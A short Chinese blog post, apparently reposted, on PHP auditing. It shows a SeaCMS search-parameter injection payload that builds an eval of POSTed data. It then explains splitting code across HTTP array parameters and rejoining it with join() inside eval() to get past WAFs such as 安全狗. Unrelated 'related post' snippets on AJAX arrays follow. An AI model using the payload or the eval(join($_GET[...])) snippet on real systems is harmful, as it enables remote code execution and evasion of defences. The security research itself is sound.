php通过http请求发送数组
最近开始学习php审计,刚好赶上研究seacms,就发现了payload处一个奇怪的点
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();9[]=ph&9[]=pinfo();
就尝试了一下,发现在接收数据时,例:
键名=a,那传递a[]=a&a[]=b时,a即为一个数组,便做了个测试,果真如此
服务器端测试代码
<?phpprint_r($_GET[1]);
?>测试结果如下
那么这一个有什么用呢?思考了一下,如果服务器上有安全狗或者waf等防护工具,那么配合其他php函数,例如join函数,可能可以达到绕过效果
提供一个简单思路
服务器测试代码
<?phpeval(join($_GET[123]));
?>测试结果如下
错误之处,敬请指正
转载于:https://blog.51cto.com/z2ppp/1974968
php通过http请求发送数组相关推荐
- ajax post请求发送数组后台接收
www.yanand.me 加上traditional: true, 转载于:https://www.cnblogs.com/terry0376/p/5620057.html
- 使用ajax发送数组请求,Ajax请求传递数组参数
var ids = []; var rows=$("#tt").datagrid("getSelections"); for(var i=0; i ids.pu ...
- php里面get和post请求,php中GET和POST请求发送几种方法总结
在php中GET和POST请求发送有很多方法,一直都没有仔细的去总结过,今天看到一站长分享的GET和POST请求发送几种方法下面整理一下. 无论是畅言还是多说,我都需要从远程抓取文章的评论数,然后存入 ...
- vue 请求参数数组_vue中get请求如何传递数组参数
前言: vue中在与后端进行数据交互时,使用axios发送请求,不做配置直接使用get请求传递数组类型参数的时候,后端是无法接收数据的,需要对axios一些简单的配置才能让后端完美的接收数组 1.问题 ...
- 【需特殊处理】如何使用request.post(Python)直接发送数组类型的方式
关于api:如何使用request.post(Python)发送数组? "值错误:太多值无法解包" | 码农家园 """声明:由于data和json都 ...
- ajax发不出去请求_Ajax请求发送成功但不进success的解决方法
1.情况描述:ajax发送成功,后台也成功响应请求,并返回了json数据,通过chrome监听请求也可以看到响应的json数据,但是就是不进success方法,反而跑到error方法中了 前端: $. ...
- 一个http请求发送到后端的详细过程
我们来看当我们在浏览器输入http://www.mycompany.com:8080/mydir/index.html,幕后所发生的一切. 首先http是一个应用层的协议,在这个层的协议,只是一种通讯 ...
- python3发送https请求_关于python 3.x:如何在不引起python3的SSL证书错误的情况下将POST请求发送到https...
事情是这样的,我一直在尝试从python内部将POST请求发送到LOGIN到我的大学wifi页面,但是却收到SSL证书错误. POST请求在chrome的POSTMAN扩展中可以正常工作. 这是我使用 ...
- 发起一个ajax请求,发送ajax请求
发送ajax请求 vue本身不支持发送ajax请求,需要使用vue-resourc axios等插件实现,建议使用axios axios是一个基于promise的http请求客户端,用来发送请求 基本 ...
最新文章
- 根据时间比较选择数据
- 【Java集合源码剖析】Java集合框架
- 关于Action返回结果类型的事儿(下)
- .NET Core 2.0迁移技巧之web.config配置文件
- stackexchange.mysql_.net core使用redis基于StackExchange.Redis
- Dubbo消费者代理的调用
- 云计算安全之CCSKv4.0(201910考的)
- PLSQL DEVELOPER编辑器的自动替换文件
- 产品结构bom设计 mongodb_产品设计人员看过来!儿童智能机器人产品结构设计解析(二)...
- html mysql留言板_【网页留言板制作】HTML + CSS + PHP + MySQL 实战
- 世界各国 MCC 和 MNC 列表
- SENTINEL Missions 哨兵卫星任务
- 【离散数学】搜集、并搜集、交搜集、求A = {{Φ, 2}, {2}}的并搜集和交搜集
- 307条互联网交流缩略语(English Abbreviations on Internet)
- Pycharm内部打不开生成的词云图,且显示Image not loaded,Try to open it externally to fix format problem,外部文件夹中图片可显示
- Artificial Intelligence-人工神经网络
- No matching provisioning profile found: Your build settings specify a provisioning profile with the
- android 4.4 art模式,安卓4.4的ART模式怎么打开 安卓4.4开启art模式方法图解
- linux(虚拟机) ext4系统磁盘扩容操作(磁盘多个分区,扩张分区大小扩张物理卷大小来扩容逻辑卷)
- wireshark数据包流量分析